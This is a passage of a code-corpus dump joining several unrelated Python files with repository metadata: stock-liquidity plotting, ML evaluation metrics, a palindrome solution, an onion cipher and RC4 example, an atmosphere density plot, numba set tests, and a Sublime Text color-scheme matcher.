hose = self.hoseData[time]
stockTradedValue = lambda stock: hose[stock][C.COL_TOTAL_VOL]*hose[stock][C.COL_AVG_PRICE]
vals = mmap(stockTradedValue, self.stocks)
return reduce(lambda a, b: a + b, vals)
self.totalLiquidity = mmap(valAtSnapShot, self.times)
################################################################################
# Plotting #
################################################################################
def plot_Liquidity_Bar(self):
return
def initializePlot(self, file,p, ENVIRON=ENVIRON, title="HOSE"):
if ENVIRON == C.LOCAL:
output_file(file)
else:
output_notebook()
if p is None:
p = figure(plot_width=PC.WIDTH, plot_height=PC.HEIGHT, title=title)
self.allPlots.append(p)
return p
return p
def plot_BS_Pressure(self, p=None, file=FN.PLOT_BUY_SELL_PRESSURE_FILE):
p = self.initializePlot(file, p, ENVIRON=ENVIRON, title="Ap luc mua, apluc ban")
p.line(self.Xs, self.cleansed[C.CBUYP], line_width=2, color="green")
p.line(self.Xs, self.cleansed[C.CSELLP], line_width=2, color="red")
show(p)
def plot_NN_Liquidity_Bar(self, file="/home/sotola/foo.html", p=None):
def prep(seconds, vals, STEP=20, REVERSED=False): # Prepare Data
bins2 = []; x = [];bins, xs = intervalize(seconds, vals, STEP=STEP)
for i in range(len(bins)):
bins2.append(bins[i]); bins2.append(bins[i])
for i in range(len(xs)):
x.append(xs[i][0]); x.append(xs[i][1])
if REVERSED: return x, [bin * -1 for bin in bins2]
else: return x, bins2
p = self.initializePlot(file, p, ENVIRON=ENVIRON, title="Thanh khoan khoi nuoc ngoai")
xbuy, topbuy = prep(self.seconds, self.nnBuyValues)
p.vbar(x=xbuy, top=toDelta(topbuy), width=0.01, color="green")
xsell, topsell = prep(self.seconds, self.nnSellValues, REVERSED=True)
p.vbar(x=xsell, top=toDelta(topsell), width=0.01, color="red")
show(p)
def plot__Liquidity_Bar(self, file="/home/sotola/Hose-MarketLiquidity.html", p=None):
def prep(seconds, vals, STEP=20, REVERSED=False): # Prepare Data
bins2 = []; x = [];bins, xs = intervalize(seconds, vals, STEP=STEP)
for i in range(len(bins)):
bins2.append(bins[i]); bins2.append(bins[i])
for i in range(len(xs)):
x.append(xs[i][0]); x.append(xs[i][1])
if REVERSED: return x, [bin * -1 for bin in bins2]
else: return x, bins2
p = self.initializePlot(file, p, ENVIRON=ENVIRON, title="Thanh Khoan Thi Truong")
xbuy, topbuy = prep(self.seconds, self.totalLiquidity)
p.vbar(x=xbuy, top=toDelta(topbuy), width=0.01, color="green")
show(p)
def plot_NN_Accumulated_Values(self, p=None, file=FN.PLOT_NN_VALUES_FILE):
p = self.initializePlot(file, p, ENVIRON=ENVIRON, title="Tong Thanh Khoan (NN)")
p.line(self.Xs, np.array(self.nnBuyValues ) / 100000, line_width=2, color="green")
p.line(self.Xs, np.array(self.nnSellValues) / 100000, line_width=2, color="red")
show(p)
def plot_NN_Velocity_Values(self, p=None, start=None, end=None, file=FN.PLOT_NN_VELOCITY_FILE):
p = self.initializePlot(file, p, ENVIRON=ENVIRON)
if not(start is None):
start_i, end_i = self.timeRange(start, end)
else:
start_i = 0; end_i = -1
buys = [x / 100000 for x in toDelta(self.nnBuyValues)[start_i:end_i]]
sells = [x / 100000 for x in toDelta(self.nnSellValues)[start_i:end_i]]
diffs = [buys[i] - sells[i] for i in range(len(sells))][start_i:end_i]
p.line(self.Xs[start_i:end_i], buys, line_width=2, color="green")
p.line(self.Xs[start_i:end_i], sells, line_width=2, color="red")
show(p)
| 41.137931
| 124
| 0.524009
| 8,027
| 0.961202
| 0
| 0
| 0
| 0
| 0
| 0
| 1,244
| 0.148964
|
6296eebeb1e65d269ec9089013edb6a402685434
| 6,790
|
py
|
Python
|
project1/evaluation.py
|
DiscoBroccoli/logistic-regression-and-naive-Bayes-from-Scratch
|
bcb24a9258ea004a3694e6eaa524b499c2584f96
|
[
"MIT"
] | null | null | null |
project1/evaluation.py
|
DiscoBroccoli/logistic-regression-and-naive-Bayes-from-Scratch
|
bcb24a9258ea004a3694e6eaa524b499c2584f96
|
[
"MIT"
] | null | null | null |
project1/evaluation.py
|
DiscoBroccoli/logistic-regression-and-naive-Bayes-from-Scratch
|
bcb24a9258ea004a3694e6eaa524b499c2584f96
|
[
"MIT"
] | null | null | null |
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
# [0,0] = TN
# [1,1] = TP
# [0,1] = FP
# [1,0] = FN
# cm is a confusion matrix
# Accuracy: (TP + TN) / Total
def accuracy(cm: pd.DataFrame) -> float:
return (cm[0,0] + cm[1,1]) / cm.sum()
# Precision: TP / (TP + FP)
def precision(cm: pd.DataFrame) -> float:
return cm[1,1] / (cm[1,1] + cm[0,1])
# False positive rate: FP / N = FP / (FP + TN)
def false_positive(cm: pd.DataFrame) -> float:
return cm[0,1] / (cm[0,0] + cm[0,1])
# True positive rate: TP / P = TP / (TP + FN)
# Equivalent to sensitivity/recall
def true_positive(cm: pd.DataFrame) -> float:
return cm[1,1] / (cm[1,0] + cm[1,1])
# F1 score: 2 * precision * recall / (precision + recall)
def f_score(cm: pd.DataFrame) -> float:
return 2 * precision(cm) * true_positive(cm) / (precision(cm) + true_positive(cm))
# Returns a confusion matrix for labels and predictions
# [[TN, FP],
# [FN, TP]]
def confusion_matrix(y, y_hat):
cm = np.zeros((2, 2))
np.add.at(cm, [y.astype(int), y_hat.astype(int)], 1)
return cm
def visualize_cm(cm):
df_cm = pd.DataFrame(cm, columns=['0', '1'], index=['0', '1'])
df_cm.index.name = 'Actual'
df_cm.columns.name = 'Predicted'
plt.figure(figsize=(5, 3))
sns.heatmap(df_cm, cmap='Blues', annot=True, annot_kws={'size': 16}, fmt='g')
# Function to return two shuffled arrays, is a deep copy
def shuffle(x, y):
x_copy = x.copy()
y_copy = y.copy()
rand = np.random.randint(0, 10000)
np.random.seed(rand)
np.random.shuffle(x_copy)
np.random.seed(rand)
np.random.shuffle(y_copy)
return x_copy, y_copy
# Shuffles and splits data into two sets
# test split will be 1/size of the data
def split(x, y, size):
x1, y1, = shuffle(x, y)
x1_test = x1[0:int(x1.shape[0] / size)]
x1_train = x1[int(x1.shape[0] / size):]
y1_test = y1[0:int(y1.shape[0] / size)]
y1_train = y1[int(y1.shape[0] / size):]
return x1_train, x1_test, y1_train, y1_test
def cross_validation(k, X, Y, model, lr=0.5, regularization=0, eps=1e-2, verbose=True):
# randomize X and Y by shuffling
x, y = shuffle(X, Y)
# split into k folds
x_folds = np.array_split(x, k)
y_folds = np.array_split(y, k)
acc = 0
f1 = 0
prec = 0
rec = 0
cms = []
for i in range(k):
validation_features = x_folds[i]
validation_labels = np.squeeze(y_folds[i])
train_features = np.delete(x_folds, i, axis=0)
train_features = np.concatenate(train_features)
train_labels = np.delete(y_folds, i, axis=0)
train_labels = np.concatenate(train_labels)
m = model(train_features, train_labels)
m.fit(lr, verbose=False, regularization=regularization, eps=eps)
predicted_labels = m.predict(validation_features)
cm = confusion_matrix(validation_labels, predicted_labels)
acc += accuracy(cm)
f1 += f_score(cm)
prec += precision(cm)
rec += true_positive(cm)
cms.append(cm)
if verbose:
print("Accuracy:", acc/k, "Precision:", prec/k, "Recall:", rec/k, "F1:", f1/k)
# Return the accuracy and array of confusion matrices
return acc/k, np.array(cms)
# assume 5 fold for now
def cross_validation_naive(k, df, model, label, cont=[], cat=[], bin=[]):
df = df.copy(deep=True)
np.random.shuffle(df.values)
df = df.reset_index(drop=True)
indices = np.arange(df.shape[0])
indices = np.array_split(indices, k)
acc = 0
f1 = 0
prec = 0
rec = 0
cms = []
for i in range(k):
val = df.loc[indices[i]]
train = df.loc[np.concatenate(np.delete(indices, i, axis=0))]
m = model(train, label, cont, cat, bin)
pred = val.apply(m.predict, axis=1)
cm = confusion_matrix(val[label], pred)
acc += accuracy(cm)
f1 += f_score(cm)
prec += precision(cm)
rec += true_positive(cm)
cms.append(cm)
print("Accuracy:", acc / k, "Precision:", prec / k, "Recall:", rec / k, "F1:", f1 / k)
# Return the accuracy and array of confusion matrices
return acc / k, np.array(cms)
def cv_task_2(k, X, Y, model, lr = 0.5, regularization=0, eps = 1e-2, iterations=200):
# randomize X and Y by shuffling
x, y = shuffle(X, Y)
# split into k folds
x_folds = np.array_split(x, k)
y_folds = np.array_split(y, k)
train_acc_history = np.empty([k, iterations])
val_acc_history = np.empty([k, iterations])
for i in range(k):
val_features = x_folds[i]
val_labels = np.squeeze(y_folds[i])
train_features = np.delete(x_folds, i)
train_features = np.concatenate(train_features)
train_labels = np.delete(y_folds, i, axis=0)
train_labels = np.concatenate(train_labels)
m = model(train_features, train_labels)
costs = []
train_accuracies = []
val_accuracies = []
# Keep on training until difference reached threshold
for j in range(iterations):
# fit model for 1 iteration
cost = m.fit(lr=lr, verbose=False, regularization=regularization, eps=None, epochs=1)
costs.append(cost)
# predict the labels and eval accuracy for train and val split
val_pred_labels = m.predict(val_features)
train_pred_labels = m.predict(train_features)
cm_val = confusion_matrix(val_labels, val_pred_labels)
cm_train = confusion_matrix(train_labels, train_pred_labels)
val_accuracies.append(accuracy(cm_val))
train_accuracies.append(accuracy(cm_train))
# store the costs and accuracies
train_acc_history[i] = np.array(train_accuracies)
val_acc_history[i] = np.array(val_accuracies)
return train_acc_history, val_acc_history
def grid_search(learning_rates, epsilons, lambdas, x, y, model):
max_acc = 0
arg_max = [0,0,0]
for lr in learning_rates:
for eps in epsilons:
for regularization in lambdas:
#print(lr, eps, regularization)
acc, cm = cross_validation(5, x, y, lr=lr, eps=eps, regularization=regularization, model=model, verbose=False)
if acc > max_acc:
max_acc = acc
arg_max = [lr, eps, regularization]
max_cm = cm
f1 = []
prec = []
rec = []
for cm in max_cm:
f1.append(f_score(cm))
prec.append(precision(cm))
rec.append(true_positive(cm))
f1 = np.mean(f1)
prec = np.mean(prec)
rec = np.mean(rec)
print(arg_max)
print("Accuracy:", max_acc, "Precision:", prec, "Recall:", rec, "F1:", f1)
return max_acc, arg_max
| 29.267241
| 126
| 0.610162
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,123
| 0.16539
|
62982d88e6406e32cdc302d54bc0206efda33025
| 957
|
py
|
Python
|
LeetCode/0005_Longest_Palindromic_Substring.py
|
Achyut-sudo/PythonAlgorithms
|
21fb6522510fde7a0877b19a8cedd4665938a4df
|
[
"MIT"
] | 144
|
2020-09-13T22:54:57.000Z
|
2022-02-24T21:54:25.000Z
|
LeetCode/0005_Longest_Palindromic_Substring.py
|
Achyut-sudo/PythonAlgorithms
|
21fb6522510fde7a0877b19a8cedd4665938a4df
|
[
"MIT"
] | 587
|
2020-05-06T18:55:07.000Z
|
2021-09-20T13:14:53.000Z
|
LeetCode/0005_Longest_Palindromic_Substring.py
|
Achyut-sudo/PythonAlgorithms
|
21fb6522510fde7a0877b19a8cedd4665938a4df
|
[
"MIT"
] | 523
|
2020-09-09T12:07:13.000Z
|
2022-02-24T21:54:31.000Z
|
'''
Problem:-
Given a string s, find the longest palindromic substring in s.
You may assume that the maximum length of s is 1000.
Example 1:
Input: "babad"
Output: "bab"
Note: "aba" is also a valid answer.
'''
class Solution:
def longestPalindrome(self, s: str) -> str:
res = ""
resLen = 0
for i in range(len(s)):
# odd length
l, r = i, i
while l >= 0 and r < len(s) and s[l] == s[r]:
if (r - l + 1) > resLen:
res = s[l:r + 1]
resLen = r - l + 1
l -= 1
r += 1
# even length
l, r = i, i + 1
while l >= 0 and r < len(s) and s[l] == s[r]:
if (r - l + 1) > resLen:
res = s[l:r + 1]
resLen = r - l + 1
l -= 1
r += 1
return res
| 25.184211
| 63
| 0.378265
| 730
| 0.7628
| 0
| 0
| 0
| 0
| 0
| 0
| 252
| 0.263323
|
6299c0fed43754304eadd3c72255fa97d06e27b5
| 119
|
py
|
Python
|
pyimagesearch/utils/__init__.py
|
agoila/lisa-faster-R-CNN
|
3b88c9b7da2106a805089f9619ea62cdc1f21d99
|
[
"MIT"
] | 17
|
2018-09-09T10:56:58.000Z
|
2022-02-22T07:18:50.000Z
|
pyimagesearch/utils/__init__.py
|
agoila/lisa-faster-R-CNN
|
3b88c9b7da2106a805089f9619ea62cdc1f21d99
|
[
"MIT"
] | null | null | null |
pyimagesearch/utils/__init__.py
|
agoila/lisa-faster-R-CNN
|
3b88c9b7da2106a805089f9619ea62cdc1f21d99
|
[
"MIT"
] | 21
|
2018-09-19T11:07:10.000Z
|
2022-02-22T07:18:45.000Z
|
# import the necessary packages
from .agegenderhelper import AgeGenderHelper
from .imagenethelper import ImageNetHelper
| 39.666667
| 44
| 0.87395
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 31
| 0.260504
|
6299f854c3c07764e1143810fd65fb9514af0ec6
| 2,965
|
py
|
Python
|
pylibressl/cipher/onion.py
|
yl3dy/pylibressl
|
ffc3e195a31a6c96b28e52a7e146995219b220b2
|
[
"MIT"
] | 2
|
2021-08-22T00:43:05.000Z
|
2021-08-22T01:57:28.000Z
|
pylibressl/cipher/onion.py
|
yl3dy/pylibressl
|
ffc3e195a31a6c96b28e52a7e146995219b220b2
|
[
"MIT"
] | null | null | null |
pylibressl/cipher/onion.py
|
yl3dy/pylibressl
|
ffc3e195a31a6c96b28e52a7e146995219b220b2
|
[
"MIT"
] | 1
|
2021-08-24T19:09:06.000Z
|
2021-08-24T19:09:06.000Z
|
from .. import lib
from ..exceptions import *
from .. import _libressl
from .cipher import BaseCipher
from .auth import BaseCipherAuth
from .auth import GOST89_HMAC_Streebog512, AES256_GCM
ffi, clib = _libressl.ffi, _libressl.lib
class OnionCipher(object):
"""Onion ciphering."""
@classmethod
def new(cls, cipher_list_, name='NewOnionCipher'):
"""Create new onion cipher chain.
Ciphers are set in encryption order.
"""
if isinstance(cipher_list_, str):
raise ValueError('cipher_list should be a list-like thing')
try:
for cipher in cipher_list_:
if not issubclass(cipher, BaseCipher):
raise ValueError('Cipher list should contain BaseCipher ' +
'subclasses.')
except TypeError:
raise ValueError('cipher_list should be a list-like thing')
return type(name, (cls,), {'cipher_list': cipher_list_})
def __init__(self, key_list):
"""Initialize onion ciphering."""
if len(key_list) != len(self.cipher_list):
raise ValueError('Key list length is not equal to number of ' +
'ciphers in a chain')
self._cipher_instances = [cipher(*key) for cipher, key in
zip(self.cipher_list, key_list)]
def encrypt(self, data):
"""Encrypt a message."""
is_authenticated = [issubclass(cipher, BaseCipherAuth) for cipher in
self.cipher_list]
message, auth_codes = data, []
for cipher, is_ae in zip(self._cipher_instances, is_authenticated):
output = cipher.encrypt(message)
if is_ae:
message, auth_code = output
auth_codes.append(auth_code)
else:
message = output
auth_codes.append(None)
return message, auth_codes
def decrypt(self, data, auth_codes):
"""Decrypt a message."""
if len(auth_codes) != len(self._cipher_instances):
raise ValueError('Authentication code list length mismatch')
is_authenticated = [issubclass(cipher, BaseCipherAuth) for cipher in
self.cipher_list]
message = data
for cipher, is_ae, auth_code in zip(reversed(self._cipher_instances),
reversed(is_authenticated),
reversed(auth_codes)):
if is_ae:
message = cipher.decrypt(message, auth_code)
else:
message = cipher.decrypt(message)
return message
Onion_AES256_GOST89 = OnionCipher.new((AES256_GCM, GOST89_HMAC_Streebog512),
name='Onion_AES256_GOST89')
Onion_AES256_GOST89.__doc__ = 'Onion ciphering: AES256-GCM + ' + \
'GOST89-HMAC-Streebog512'
| 37.0625
| 79
| 0.577403
| 2,464
| 0.831029
| 0
| 0
| 686
| 0.231366
| 0
| 0
| 543
| 0.183137
|
629aa7218a98f287f8a5760fc5e65461390c3529
| 1,149
|
py
|
Python
|
tests/plots/density_estimate.py
|
bws428/ambiance
|
8cbc5fe38f34e1ce8ccf568d0961ad6573f7b612
|
[
"Apache-2.0"
] | 18
|
2020-03-06T14:54:29.000Z
|
2022-03-21T20:20:42.000Z
|
tests/plots/density_estimate.py
|
bws428/ambiance
|
8cbc5fe38f34e1ce8ccf568d0961ad6573f7b612
|
[
"Apache-2.0"
] | 7
|
2020-04-19T15:21:54.000Z
|
2022-03-05T14:27:38.000Z
|
tests/plots/density_estimate.py
|
bws428/ambiance
|
8cbc5fe38f34e1ce8ccf568d0961ad6573f7b612
|
[
"Apache-2.0"
] | 7
|
2019-12-30T16:22:24.000Z
|
2021-09-08T07:36:23.000Z
|
import os
import numpy as np
import matplotlib.pyplot as plt
from ambiance import Atmosphere, CONST
HERE = os.path.abspath(os.path.dirname(__file__))
FILE_NAME = os.path.basename(__file__).replace('.py', '.png')
PATH_OUT = os.path.join(HERE, FILE_NAME)
def density_estimate(h):
return 10**((h - 2.33e3)/-16.3e3)
# Make an atmosphere object
heights = np.linspace(-10e3, 90e3, num=1000)
rho_actual = Atmosphere(heights, check_bounds=False).density
rho_approx = density_estimate(heights)
fig, (ax1, ax2) = plt.subplots(1, 2, sharey=True, tight_layout=True)
ax1.plot(rho_actual, heights/1000, label='Actual', c='blue')
ax1.plot(rho_approx, heights/1000, '--', label='Estimate', c='red')
ax1.set_xlabel("Density [kg/m^3]")
ax1.set_ylabel("Height [km]")
ax1.set_xscale("log")
ax1.grid()
ax1.legend()
for ax in (ax1, ax2):
ax.axhline(y=CONST.h_min/1000, ls=':', color='black')
ax.axhline(y=CONST.h_max/1000, ls=':', color='black')
rdiff = (rho_approx - rho_actual)/rho_actual
ax2.plot(rdiff*100, heights/1000, label='Relative error', c='red')
ax2.set_xlabel("Relative error [%]")
ax2.grid()
plt.savefig(PATH_OUT)
plt.show()
plt.clf()
| 27.357143
| 68
| 0.711923
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 168
| 0.146214
|
629b94b4505379de3aa682273cf3ce0b75e0c007
| 1,277
|
py
|
Python
|
pkgs/numba-0.24.0-np110py27_0/lib/python2.7/site-packages/numba/tests/test_sets.py
|
wangyum/anaconda
|
6e5a0dbead3327661d73a61e85414cf92aa52be6
|
[
"Apache-2.0",
"BSD-3-Clause"
] | 1
|
2015-01-29T06:52:36.000Z
|
2015-01-29T06:52:36.000Z
|
pkgs/numba-0.24.0-np110py27_0/lib/python2.7/site-packages/numba/tests/test_sets.py
|
wangyum/anaconda
|
6e5a0dbead3327661d73a61e85414cf92aa52be6
|
[
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null |
pkgs/numba-0.24.0-np110py27_0/lib/python2.7/site-packages/numba/tests/test_sets.py
|
wangyum/anaconda
|
6e5a0dbead3327661d73a61e85414cf92aa52be6
|
[
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null |
from __future__ import print_function
import numba.unittest_support as unittest
from numba.utils import PYVERSION
from .support import TestCase, enable_pyobj_flags
def build_set_usecase(*args):
ns = {}
src = """if 1:
def build_set():
return {%s}
""" % ', '.join(repr(arg) for arg in args)
code = compile(src, '<>', 'exec')
eval(code, ns)
return ns['build_set']
needs_set_literals = unittest.skipIf(PYVERSION < (2, 7),
"set literals unavailable before Python 2.7")
class SetTestCase(TestCase):
@needs_set_literals
def test_build_set(self, flags=enable_pyobj_flags):
pyfunc = build_set_usecase(1, 2, 3, 2)
self.run_nullary_func(pyfunc, flags=flags)
@needs_set_literals
def test_build_heterogenous_set(self, flags=enable_pyobj_flags):
pyfunc = build_set_usecase(1, 2.0, 3j, 2)
self.run_nullary_func(pyfunc, flags=flags)
# Check that items are inserted in the right order (here the
# result will be {2}, not {2.0})
pyfunc = build_set_usecase(2.0, 2)
got, expected = self.run_nullary_func(pyfunc, flags=flags)
self.assertIs(type(got.pop()), type(expected.pop()))
if __name__ == '__main__':
unittest.main()
| 29.697674
| 82
| 0.653876
| 683
| 0.534847
| 0
| 0
| 643
| 0.503524
| 0
| 0
| 228
| 0.178543
|
629ca661207da75df901826b3e4cddc99718c385
| 1,188
|
py
|
Python
|
docs/_static/rc4.py
|
Varbin/pep272-encryption
|
db0795396226a9d49d8825e29c550739ff222539
|
[
"CC0-1.0"
] | 1
|
2021-07-08T21:37:17.000Z
|
2021-07-08T21:37:17.000Z
|
docs/_static/rc4.py
|
Varbin/pep272-encryption
|
db0795396226a9d49d8825e29c550739ff222539
|
[
"CC0-1.0"
] | null | null | null |
docs/_static/rc4.py
|
Varbin/pep272-encryption
|
db0795396226a9d49d8825e29c550739ff222539
|
[
"CC0-1.0"
] | null | null | null |
from pep272_encryption import PEP272Cipher, MODE_ECB
block_size = 1
key_size = 0
def new(*args, **kwargs):
return RC4Cipher(*args, **kwargs)
class RC4Cipher(PEP272Cipher):
block_size = 1
key_size = 0
def __init__(self, key, mode=MODE_ECB, **kwargs):
if mode != MODE_ECB:
raise ValueError("Stream ciphers only support ECB mode")
self.S = list(range(256))
j = 0
for i in range(256):
j = (j + self.S[i] + key[i % len(key)]) % 256
self.S[i], self.S[j] = self.S[j], self.S[i]
self.i = self.j = 0
PEP272Cipher.__init__(self, key, mode, **kwargs)
def encrypt_block(self, key, block, **kwargs):
self.i = (self.i + 1) % 256
self.j = (self.j + self.S[self.i]) % 256
self.S[self.i], self.S[self.j] = self.S[self.j], self.S[self.i]
K = self.S[(self.S[self.i] + self.S[self.j]) % 256]
return bytes([block[0] ^ K])
def decrypt_block(self, key, block, **kwargs):
return self.encrypt_block(key, block, **kwargs)
assert RC4Cipher(b'\x01\x02\x03\x04\x05').encrypt(b'\x00'*16) \
== b"\xb29c\x05\xf0=\xc0'\xcc\xc3RJ\n\x11\x18\xa8"
| 27.627907
| 71
| 0.574074
| 913
| 0.768519
| 0
| 0
| 0
| 0
| 0
| 0
| 115
| 0.096801
|
629e0a7c590dbbe85c6d17dfffa34ca982e371ac
| 12,316
|
py
|
Python
|
Packages/mdpopups/st3/mdpopups/st_color_scheme_matcher.py
|
Michael-Villano/Sublime-setup
|
15a992d5982337169dadb50fd0dbca4ca3be992e
|
[
"MIT"
] | 49
|
2016-06-29T22:51:50.000Z
|
2020-07-06T09:15:41.000Z
|
Packages/mdpopups/st3/mdpopups/st_color_scheme_matcher.py
|
Michael-Villano/Sublime-setup
|
15a992d5982337169dadb50fd0dbca4ca3be992e
|
[
"MIT"
] | 1
|
2019-07-20T11:09:14.000Z
|
2019-07-20T11:09:14.000Z
|
Packages/mdpopups/st3/mdpopups/st_color_scheme_matcher.py
|
Michael-Villano/Sublime-setup
|
15a992d5982337169dadb50fd0dbca4ca3be992e
|
[
"MIT"
] | 13
|
2016-09-13T13:26:24.000Z
|
2021-04-28T03:17:19.000Z
|
"""
color_scheme_matcher.
Licensed under MIT.
Copyright (C) 2012 Andrew Gibson <agibsonsw@gmail.com>
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and
to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of
the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO
THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
---------------------
Original code has been heavily modifed by Isaac Muse <isaacmuse@gmail.com> for the ExportHtml project.
Algorithm has been split out into a separate library and been enhanced with a number of features.
"""
from __future__ import absolute_import
import sublime
import re
from .rgba import RGBA
from os import path
from collections import namedtuple
from plistlib import readPlistFromBytes
class SchemeColors(
namedtuple(
'SchemeColors',
['fg', 'fg_simulated', 'bg', "bg_simulated", "style", "fg_selector", "bg_selector", "style_selectors"],
verbose=False
)
):
"""SchemeColors."""
class SchemeSelectors(namedtuple('SchemeSelectors', ['name', 'scope'], verbose=False)):
"""SchemeSelectors."""
def sublime_format_path(pth):
"""Format path for sublime internal use."""
m = re.match(r"^([A-Za-z]{1}):(?:/|\\)(.*)", pth)
if sublime.platform() == "windows" and m is not None:
pth = m.group(1) + "/" + m.group(2)
return pth.replace("\\", "/")
class ColorSchemeMatcher(object):
"""Determine color scheme colors and style for text in a Sublime view buffer."""
def __init__(self, scheme_file, color_filter=None):
"""Initialize."""
if color_filter is None:
color_filter = self.filter
self.color_scheme = path.normpath(scheme_file)
self.scheme_file = path.basename(self.color_scheme)
self.plist_file = color_filter(
readPlistFromBytes(
re.sub(
br"^[\r\n\s]*<!--[\s\S]*?-->[\s\r\n]*|<!--[\s\S]*?-->", b'',
sublime.load_binary_resource(sublime_format_path(self.color_scheme))
)
)
)
self.scheme_file = scheme_file
self.matched = {}
self.parse_scheme()
def filter(self, plist):
"""Dummy filter call that does nothing."""
return plist
def parse_scheme(self):
"""Parse the color scheme."""
color_settings = {}
for item in self.plist_file["settings"]:
if item.get('scope', None) is None and item.get('name', None) is None:
color_settings = item["settings"]
break
# Get general theme colors from color scheme file
bground, bground_sim = self.strip_color(
color_settings.get("background", '#FFFFFF'), simple_strip=True
)
# Need to set background so other colors can simulate their transparency.
self.special_colors = {
"background": {'color': bground, 'color_simulated': bground_sim}
}
fground, fground_sim = self.strip_color(color_settings.get("foreground", '#000000'))
sbground = self.strip_color(color_settings.get("selection", fground))[0]
sbground_sim = self.strip_color(color_settings.get("selection", fground_sim))[1]
sfground, sfground_sim = self.strip_color(color_settings.get("selectionForeground", None))
gbground = self.strip_color(color_settings.get("gutter", bground))[0]
gbground_sim = self.strip_color(color_settings.get("gutter", bground_sim))[1]
gfground = self.strip_color(color_settings.get("gutterForeground", fground))[0]
gfground_sim = self.strip_color(color_settings.get("gutterForeground", fground_sim))[1]
self.special_colors["foreground"] = {'color': fground, 'color_simulated': fground_sim}
self.special_colors["background"] = {'color': bground, 'color_simulated': bground_sim}
self.special_colors["selectionForeground"] = {'color': sfground, 'color_simulated': sfground_sim}
self.special_colors["selection"] = {'color': sbground, 'color_simulated': sbground_sim}
self.special_colors["gutter"] = {'color': gbground, 'color_simulated': gbground_sim}
self.special_colors["gutterForeground"] = {'color': gfground, 'color_simulated': gfground_sim}
# Create scope colors mapping from color scheme file
self.colors = {}
for item in self.plist_file["settings"]:
name = item.get('name', '')
scope = item.get('scope', None)
color = None
style = []
if 'settings' in item and scope is not None:
color = item['settings'].get('foreground', None)
bgcolor = item['settings'].get('background', None)
if 'fontStyle' in item['settings']:
for s in item['settings']['fontStyle'].split(' '):
if s == "bold" or s == "italic": # or s == "underline":
style.append(s)
if scope is not None and (color is not None or bgcolor is not None):
fg, fg_sim = self.strip_color(color)
bg, bg_sim = self.strip_color(bgcolor)
self.colors[scope] = {
"name": name,
"scope": scope,
"color": fg,
"color_simulated": fg_sim,
"bgcolor": bg,
"bgcolor_simulated": bg_sim,
"style": style
}
def strip_color(self, color, simple_strip=False):
"""
Strip transparency from the color value.
Transparency can be stripped in one of two ways:
- Simply mask off the alpha channel.
- Apply the alpha channel to the color essential getting the color seen by the eye.
"""
if color is None or color.strip() == "":
return None, None
rgba = RGBA(color.replace(" ", ""))
if not simple_strip:
bground = self.special_colors['background']['color_simulated']
rgba.apply_alpha(bground if bground != "" else "#FFFFFF")
return color, rgba.get_rgb()
def get_special_color(self, name, simulate_transparency=False):
"""
Get the core colors (background, foreground) for the view and gutter.
Get the visible look of the color by simulated transparency if requrested.
"""
return self.special_colors.get(name, {}).get('color_simulated' if simulate_transparency else 'color')
def get_plist_file(self):
"""Get the plist file used during the process."""
return self.plist_file
def get_scheme_file(self):
"""Get the scheme file used during the process."""
return self.scheme_file
def guess_color(self, scope_key, selected=False, explicit_background=False):
"""
Guess the colors and style of the text for the given Sublime scope.
By default, we always fall back to the schemes default background,
but if desired, we can show that no background was explicitly
specified by returning None. This is done by enabling explicit_background.
This will only show backgrounds that were explicitly specified.
This was orginially introduced for mdpopups so that it would
know when a background was not needed. This allowed mdpopups
to generate syntax highlighted code that could be overlayed on
block elements with different background colors and allow that
background would show through.
"""
color = self.special_colors['foreground']['color']
color_sim = self.special_colors['foreground']['color_simulated']
bgcolor = self.special_colors['background']['color'] if not explicit_background else None
bgcolor_sim = self.special_colors['background']['color_simulated'] if not explicit_background else None
style = set([])
color_selector = SchemeSelectors("foreground", "foreground")
bg_selector = SchemeSelectors("background", "background")
style_selectors = {"bold": SchemeSelectors("", ""), "italic": SchemeSelectors("", "")}
if scope_key in self.matched:
color = self.matched[scope_key]["color"]
color_sim = self.matched[scope_key]["color_simulated"]
style = self.matched[scope_key]["style"]
bgcolor = self.matched[scope_key]["bgcolor"]
bgcolor_sim = self.matched[scope_key]["bgcolor_simulated"]
selectors = self.matched[scope_key]["selectors"]
color_selector = selectors["color"]
bg_selector = selectors["background"]
style_selectors = selectors["style"]
else:
best_match_bg = 0
best_match_fg = 0
best_match_style = 0
for key in self.colors:
match = sublime.score_selector(scope_key, key)
if self.colors[key]["color"] is not None and match > best_match_fg:
best_match_fg = match
color = self.colors[key]["color"]
color_sim = self.colors[key]["color_simulated"]
color_selector = SchemeSelectors(self.colors[key]["name"], self.colors[key]["scope"])
if self.colors[key]["style"] is not None and match > best_match_style:
best_match_style = match
for s in self.colors[key]["style"]:
style.add(s)
if s == "bold":
style_selectors["bold"] = SchemeSelectors(
self.colors[key]["name"], self.colors[key]["scope"]
)
elif s == "italic":
style_selectors["italic"] = SchemeSelectors(
self.colors[key]["name"], self.colors[key]["scope"]
)
if self.colors[key]["bgcolor"] is not None and match > best_match_bg:
best_match_bg = match
bgcolor = self.colors[key]["bgcolor"]
bgcolor_sim = self.colors[key]["bgcolor_simulated"]
bg_selector = SchemeSelectors(self.colors[key]["name"], self.colors[key]["scope"])
if len(style) == 0:
style = ""
else:
style = ' '.join(style)
self.matched[scope_key] = {
"color": color,
"bgcolor": bgcolor,
